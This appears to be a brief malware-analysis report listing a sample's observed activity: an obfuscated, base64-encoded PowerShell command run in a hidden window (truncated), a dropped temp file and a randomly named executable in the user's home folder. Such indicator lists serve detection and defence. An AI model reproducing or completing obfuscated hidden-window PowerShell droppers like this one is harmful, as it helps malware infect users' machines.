Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAMQBlADUAcgByAD0AKAAnAEwAJwArACcAZwBkACcAKwAoACcAZABsACcAKwAnAGIAbQAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAGUAcgBQAHIAbwBmAEkATABFAFwAUAAwAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1988
- %TEMP%\882185.cvr
- %HOMEPATH%\p0btst0\n34vr3o\f3j2mdem1.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAMQBlADUAcgByAD0AKAAnAEwAJwArACcAZwBkACcAKwAoACcAZABsACcAKwAnAGIAbQAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAGUAcgBQAHIAbwBmAEkATABFAFwAUAAwAE...' (with a hidden window)